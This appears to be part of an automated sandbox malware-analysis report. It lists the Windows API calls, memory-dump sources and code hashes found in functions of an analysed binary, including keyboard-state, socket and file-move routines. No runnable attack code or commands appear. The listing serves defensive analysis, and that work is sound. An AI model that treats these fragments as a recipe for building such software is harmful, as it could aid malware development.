                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                  • String ID: NULL Pointer assignment
                                                                                  • API String ID: 614568839-2785691316
                                                                                  • Opcode ID: 4d1fdcad2731df26623200f63529c95722f6bc60adb8f587bcb51ca47148eadf
                                                                                  • Instruction ID: 76ab0e07a4900ef5148d5fc95b0c33116f4042b27d392873c5a91e01e9a46128
                                                                                  • Opcode Fuzzy Hash: 4d1fdcad2731df26623200f63529c95722f6bc60adb8f587bcb51ca47148eadf
                                                                                  • Instruction Fuzzy Hash: 72914671D1021DAFDF15EFA4D881EEEB7B8BF18304F10416AE915AB241EB709A54CFA0
                                                                                  APIs
                                                                                  • GetMenu.USER32(?), ref: 00252183
                                                                                  • GetMenuItemCount.USER32(00000000), ref: 002521B5
                                                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002521DD
                                                                                  • _wcslen.LIBCMT ref: 00252213
                                                                                  • GetMenuItemID.USER32(?,?), ref: 0025224D
                                                                                  • GetSubMenu.USER32(?,?), ref: 0025225B
                                                                                    • Part of subcall function 00223A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00223A57
                                                                                    • Part of subcall function 00223A3D: GetCurrentThreadId.KERNEL32 ref: 00223A5E
                                                                                    • Part of subcall function 00223A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002225B3), ref: 00223A65
                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002522E3
                                                                                    • Part of subcall function 0022E97B: Sleep.KERNEL32 ref: 0022E9F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 4196846111-0
                                                                                  • Opcode ID: 9611755b3f684b6324334ccb9b16022d3cc9b5715d6929e9a2745ff1371dcb7d
                                                                                  • Instruction ID: 02efa6b7beef171683aca678d6e6dc134e27a376d8c81c0cecb2798de4325615
                                                                                  • Opcode Fuzzy Hash: 9611755b3f684b6324334ccb9b16022d3cc9b5715d6929e9a2745ff1371dcb7d
                                                                                  • Instruction Fuzzy Hash: EF719E35A10205EFCB10DFA4C885AAEB7B5EF59311F108459E81AEB381D734EE498B94
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 0022AEF9
                                                                                  • GetKeyboardState.USER32(?), ref: 0022AF0E
                                                                                  • SetKeyboardState.USER32(?), ref: 0022AF6F
                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 0022AF9D
                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 0022AFBC
                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 0022AFFD
                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0022B020
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 12befff22f02ee20c98431a3abb8ffee3f6c75e7ebc2a339b0fb6ec6463ddc93
                                                                                  • Instruction ID: 0fbe4dacc2c0c3f37a5a431cb0216dfdb6781f830abc1eeb2263cd4e0257882a
                                                                                  • Opcode Fuzzy Hash: 12befff22f02ee20c98431a3abb8ffee3f6c75e7ebc2a339b0fb6ec6463ddc93
                                                                                  • Instruction Fuzzy Hash: 405125A0A247E23EFB3746B49C05BBA7FE95B06304F088589E1D845CC2D3D9ADE4D751
                                                                                  APIs
                                                                                  • GetParent.USER32(00000000), ref: 0022AD19
                                                                                  • GetKeyboardState.USER32(?), ref: 0022AD2E
                                                                                  • SetKeyboardState.USER32(?), ref: 0022AD8F
                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0022ADBB
                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0022ADD8
                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0022AE17
                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0022AE38
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                  • String ID:
                                                                                  • API String ID: 87235514-0
                                                                                  • Opcode ID: 877fa7f3c74c786e941bf88a6750e9e3e2d2ed0a3700ae81702a6f5e20609b25
                                                                                  • Instruction ID: e5e6647c665924386370dec3546afd60cfac500a885a4adedc916d0a393b5a82
                                                                                  • Opcode Fuzzy Hash: 877fa7f3c74c786e941bf88a6750e9e3e2d2ed0a3700ae81702a6f5e20609b25
                                                                                  • Instruction Fuzzy Hash: 065129A09247F23EFB374BB4AC45B7ABF985B45300F088598E1D546CC3D294ECA4D752
                                                                                  APIs
                                                                                  • GetConsoleCP.KERNEL32(00203CD6,?,?,?,?,?,?,?,?,001F5BA3,?,?,00203CD6,?,?), ref: 001F5470
                                                                                  • __fassign.LIBCMT ref: 001F54EB
                                                                                  • __fassign.LIBCMT ref: 001F5506
                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00203CD6,00000005,00000000,00000000), ref: 001F552C
                                                                                  • WriteFile.KERNEL32(?,00203CD6,00000000,001F5BA3,00000000,?,?,?,?,?,?,?,?,?,001F5BA3,?), ref: 001F554B
                                                                                  • WriteFile.KERNEL32(?,?,00000001,001F5BA3,00000000,?,?,?,?,?,?,?,?,?,001F5BA3,?), ref: 001F5584
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 1324828854-0
                                                                                  • Opcode ID: 7a6b1f8c912c6c84655e5dd608cb1a5df2a83b295801326a501c6f3fd448e592
                                                                                  • Instruction ID: 620cde33644f0f9c925eb1f1154e28897a986b25579c0a3ca14f7964e14c9f4c
                                                                                  • Opcode Fuzzy Hash: 7a6b1f8c912c6c84655e5dd608cb1a5df2a83b295801326a501c6f3fd448e592
                                                                                  • Instruction Fuzzy Hash: 1D519471900B4D9FDB11CFA8D889AFEBBF6EF09300F14415AE655E7291E7709A41CB60
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 001E2D4B
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 001E2D53
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 001E2DE1
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 001E2E0C
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 001E2E61
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 1170836740-1018135373
                                                                                  • Opcode ID: 9283ddcc77a32a8cbbee0313bce335cefbb6f8b8260b91f1258d062dce0e242a
                                                                                  • Instruction ID: 0ed4e7ccb33f07aa7d7400c8d7fe1d788cda2d5a4901ccb9392c2b89e46e2eb1
                                                                                  • Opcode Fuzzy Hash: 9283ddcc77a32a8cbbee0313bce335cefbb6f8b8260b91f1258d062dce0e242a
                                                                                  • Instruction Fuzzy Hash: FD41E634E00688EBCF14DFAACC59A9EBBB8BF44324F148155F9146B392D7719A11CBD0
                                                                                  APIs
                                                                                    • Part of subcall function 0024304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0024307A
                                                                                    • Part of subcall function 0024304E: _wcslen.LIBCMT ref: 0024309B
                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00241112
                                                                                  • WSAGetLastError.WSOCK32 ref: 00241121
                                                                                  • WSAGetLastError.WSOCK32 ref: 002411C9
                                                                                  • closesocket.WSOCK32(00000000), ref: 002411F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                  • String ID:
                                                                                  • API String ID: 2675159561-0
                                                                                  • Opcode ID: 730eac0241349395bee42a177c2a071255d1054b09fa2a02d30935e80766ea5d
                                                                                  • Instruction ID: 4a7a6bd6518d8afbfc22812630ae021b2eb6cd7688b3243ea66a833de4d673f2
                                                                                  • Opcode Fuzzy Hash: 730eac0241349395bee42a177c2a071255d1054b09fa2a02d30935e80766ea5d
                                                                                  • Instruction Fuzzy Hash: B7410331610205AFDB14DF24D889BAABBE9EF45324F148059FD0D9B291D770ED91CBE0
                                                                                  APIs
                                                                                    • Part of subcall function 0022DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0022CF22,?), ref: 0022DDFD
                                                                                    • Part of subcall function 0022DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0022CF22,?), ref: 0022DE16
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0022CF45
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0022CF7F
                                                                                  • _wcslen.LIBCMT ref: 0022D005
                                                                                  • _wcslen.LIBCMT ref: 0022D01B
                                                                                  • SHFileOperationW.SHELL32(?), ref: 0022D061
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 3164238972-1173974218
                                                                                  • Opcode ID: 3dc9bb28ad5ccb14e7866e8173fe200e5cf158603cd4e8708bc489ff4d7e99f4
                                                                                  • Instruction ID: db698eff49201125c155b9cc9eb84b0844b74313e26a3277f0a900f4e50382b1
                                                                                  • Opcode Fuzzy Hash: 3dc9bb28ad5ccb14e7866e8173fe200e5cf158603cd4e8708bc489ff4d7e99f4
                                                                                  • Instruction Fuzzy Hash: 4A4167718152296FDF12EFE4DA81ADD77B8AF18340F1000E6E545EB152EB34A654CF50
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00252E1C
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00252E4F
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00252E84
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00252EB6
                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00252EE0
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00252EF1
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00252F0B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongWindow$MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 2178440468-0
                                                                                  • Opcode ID: 42d2cc6da937d136d1283c0b2bfb1ecac1c9a0cdcb95fbad84f7b29e516801c7
                                                                                  • Instruction ID: 47b3d90e73dffc88fc0b7fe2cf62cfe4e17d7766b3b829b5ef07e77533cfa255
                                                                                  • Opcode Fuzzy Hash: 42d2cc6da937d136d1283c0b2bfb1ecac1c9a0cdcb95fbad84f7b29e516801c7
                                                                                  • Instruction Fuzzy Hash: 9E311430614252DFEB258F58EC8AF6537E4EB8A712F140165F9009B2B2CB71B8689B08
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00227769
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0022778F
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00227792
                                                                                  • SysAllocString.OLEAUT32(?), ref: 002277B0
                                                                                  • SysFreeString.OLEAUT32(?), ref: 002277B9
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 002277DE
                                                                                  • SysAllocString.OLEAUT32(?), ref: 002277EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 43399db00a4ebd1800c953ed5664e59ced7d98da46ce5fa316a677604ad66722
                                                                                  • Instruction ID: a7f2c81ed3f52e4a8daa71292666f4b574c8183d3ad317abaeb307d3529e0c72
                                                                                  • Opcode Fuzzy Hash: 43399db00a4ebd1800c953ed5664e59ced7d98da46ce5fa316a677604ad66722
                                                                                  • Instruction Fuzzy Hash: F821B27661832ABFDB10EFA8EC88CBBB3ACEB093647108025F905DB250E670DD418764
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00227842
                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00227868
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 0022786B
                                                                                  • SysAllocString.OLEAUT32 ref: 0022788C
                                                                                  • SysFreeString.OLEAUT32 ref: 00227895
                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 002278AF
                                                                                  • SysAllocString.OLEAUT32(?), ref: 002278BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                  • String ID:
                                                                                  • API String ID: 3761583154-0
                                                                                  • Opcode ID: 71e30e29b690f1858b73cec367aca9ad95e9adeaa4f00265ee1dd9ef95bb4e86
                                                                                  • Instruction ID: d8c82f974b6d0a8811f812acc01c6453ed7a7f44894aaa629429b882d6ebaf42
                                                                                  • Opcode Fuzzy Hash: 71e30e29b690f1858b73cec367aca9ad95e9adeaa4f00265ee1dd9ef95bb4e86
                                                                                  • Instruction Fuzzy Hash: B121A131618225BFDB10AFE8EC8CDAA77ECEB083607108125F915CB2A1E670DC41DB69
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 002304F2
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0023052E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandlePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 1424370930-2873401336
                                                                                  • Opcode ID: dcafb4b50972fee547e75d1a8f0a4bb10bf35c7964718b43ba5555b23e3716aa
                                                                                  • Instruction ID: df9744dca1242053d1c143affa8ca83e50b707303c9842c1fdadd8f66ebf1d21
                                                                                  • Opcode Fuzzy Hash: dcafb4b50972fee547e75d1a8f0a4bb10bf35c7964718b43ba5555b23e3716aa
                                                                                  • Instruction Fuzzy Hash: 99216DB5910306AFDB209F29DC98A9A77B4BF44724F604A19F8A1D62E0E7709960CF30
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 002305C6
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00230601
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandlePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 1424370930-2873401336
                                                                                  • Opcode ID: ac0e34be2968451d826f113e383404fe84080fb3efd0ec3ae4df081f52a2c64c
                                                                                  • Instruction ID: 917814fd52ca82eeff58a957a43cca5d9ce9395f3488c901a0322d4ce8639064
                                                                                  • Opcode Fuzzy Hash: ac0e34be2968451d826f113e383404fe84080fb3efd0ec3ae4df081f52a2c64c
                                                                                  • Instruction Fuzzy Hash: 202174B55103069FDB209F699C95A5A77ACBF95B20F200A19E8A1D72D4D7B09870CF24
                                                                                  APIs
                                                                                    • Part of subcall function 001C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C604C
                                                                                    • Part of subcall function 001C600E: GetStockObject.GDI32(00000011), ref: 001C6060
                                                                                    • Part of subcall function 001C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001C606A
                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00254112
                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0025411F
                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0025412A
                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00254139
                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00254145
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                  • String ID: Msctls_Progress32
                                                                                  • API String ID: 1025951953-3636473452
                                                                                  • Opcode ID: d0f28dda8ffd0e584b4cd3788eb2704d703df76148dc4ec850d5c3ec571dabdd
                                                                                  • Instruction ID: 85a9d7965186134d77bcf43d54bc91a420286865e79242d479e049ec0a8cb735
                                                                                  • Opcode Fuzzy Hash: d0f28dda8ffd0e584b4cd3788eb2704d703df76148dc4ec850d5c3ec571dabdd
                                                                                  • Instruction Fuzzy Hash: 9711B2B215021ABEEF119F64CC85EE7BF9DEF18798F108111BA18A2090C772DC71DBA4
                                                                                  APIs
                                                                                    • Part of subcall function 001FD7A3: _free.LIBCMT ref: 001FD7CC
                                                                                  • _free.LIBCMT ref: 001FD82D
                                                                                    • Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
                                                                                    • Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0
                                                                                  • _free.LIBCMT ref: 001FD838
                                                                                  • _free.LIBCMT ref: 001FD843
                                                                                  • _free.LIBCMT ref: 001FD897
                                                                                  • _free.LIBCMT ref: 001FD8A2
                                                                                  • _free.LIBCMT ref: 001FD8AD
                                                                                  • _free.LIBCMT ref: 001FD8B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
